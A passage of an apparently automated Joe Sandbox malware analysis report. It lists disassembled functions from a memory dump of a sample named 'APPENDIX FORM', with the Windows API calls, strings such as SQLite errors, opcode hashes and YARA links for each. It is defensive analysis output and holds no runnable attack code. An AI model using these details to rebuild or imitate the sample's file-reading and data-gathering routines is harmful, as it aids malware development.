                                                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                              • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                              • API String ID: 2618321458-3614832568
                                                                                                              • Opcode ID: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                                                                                              • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                                              • Opcode Fuzzy Hash: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                                                                                              • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                                              Function 004185CA Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AttributesFilefreememset
                                                                                                              • String ID:
                                                                                                              • API String ID: 2507021081-0
                                                                                                              • Opcode ID: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
                                                                                                              • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                                              • Opcode Fuzzy Hash: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
                                                                                                              • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                                              Function 004174F5 Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                                              • malloc.MSVCRT ref: 00417524
                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                                              • free.MSVCRT ref: 00417544
                                                                                                              • free.MSVCRT ref: 00417562
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                                              • String ID:
                                                                                                              • API String ID: 4131324427-0
                                                                                                              • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                                              • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                                              • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                                              • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                                              Function 00418197 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                                              • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                                              • free.MSVCRT ref: 0041822B
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: PathTemp$free
                                                                                                              • String ID: %s\etilqs_$etilqs_
                                                                                                              • API String ID: 924794160-1420421710
                                                                                                              • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                              • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                                              • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                              • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                                              Function 0040FD9E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 0040FDD5
                                                                                                                • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                                • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                              • _snwprintf.MSVCRT ref: 0040FE1F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                              • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                              • API String ID: 1775345501-2769808009
                                                                                                              • Opcode ID: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                                                                                              • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                                                                              • Opcode Fuzzy Hash: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                                                                                              • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                                                              Function 00414770 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • wcscpy.MSVCRT ref: 0041477F
                                                                                                              • wcscpy.MSVCRT ref: 0041479A
                                                                                                              • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General,?,00000000,00000001), ref: 004147C1
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: wcscpy$CloseCreateFileHandle
                                                                                                              • String ID: General
                                                                                                              • API String ID: 999786162-26480598
                                                                                                              • Opcode ID: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                                                                                              • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                                              • Opcode Fuzzy Hash: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                                                                                              • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                                              Function 0040973C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                                                                              • _snwprintf.MSVCRT ref: 0040977D
                                                                                                              • MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLastMessage_snwprintf
                                                                                                              • String ID: Error$Error %d: %s
                                                                                                              • API String ID: 313946961-1552265934
                                                                                                              • Opcode ID: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                                                                                              • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                                              • Opcode Fuzzy Hash: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                                                                                              • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                                              Function 00435A61 Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 394COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: foreign key constraint failed$new$oid$old
                                                                                                              • API String ID: 0-1953309616
                                                                                                              • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                              • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                                              • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                              • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                                                              Function 00431671 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 231COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                                              • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                                              • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpy
                                                                                                              • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                              • API String ID: 3510742995-272990098
                                                                                                              • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                              • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                                              • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                              • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                                              Function 0044A6E0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 84COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 0044A6EB
                                                                                                              • memset.MSVCRT ref: 0044A6FB
                                                                                                              • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                              • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpymemset
                                                                                                              • String ID: gj
                                                                                                              • API String ID: 1297977491-4203073231
                                                                                                              • Opcode ID: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                                                                                              • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                                              • Opcode Fuzzy Hash: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                                                                                              • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                                              Function 0040E946 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E961
                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E974
                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E987
                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E99A
                                                                                                              • free.MSVCRT ref: 0040E9D3
                                                                                                                • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ??3@$free
                                                                                                              • String ID:
                                                                                                              • API String ID: 2241099983-0
                                                                                                              • Opcode ID: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
                                                                                                              • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                                              • Opcode Fuzzy Hash: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
                                                                                                              • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                                              Function 0041748F Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                              • malloc.MSVCRT ref: 004174BD
                                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                              • free.MSVCRT ref: 004174E4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                                              • String ID:
                                                                                                              • API String ID: 4053608372-0
                                                                                                              • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                                              • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                                              • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                                              • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                                              Function 0040D441 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetParent.USER32(?), ref: 0040D453
                                                                                                              • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                              • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                              • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                              • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$Rect$ClientParentPoints
                                                                                                              • String ID:
                                                                                                              • API String ID: 4247780290-0
                                                                                                              • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                              • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                                              • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                              • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                                              Function 00445093 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                              • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                              • memset.MSVCRT ref: 004450CD
                                                                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                                • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                              • String ID:
                                                                                                              • API String ID: 1471605966-0
                                                                                                              • Opcode ID: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                                                                                              • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                                              • Opcode Fuzzy Hash: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                                                                                              • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                                              Function 0044474A Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • wcscpy.MSVCRT ref: 0044475F
                                                                                                              • wcscat.MSVCRT ref: 0044476E
                                                                                                              • wcscat.MSVCRT ref: 0044477F
                                                                                                              • wcscat.MSVCRT ref: 0044478E
                                                                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                                • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                                                                • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                                              • String ID: \StringFileInfo\
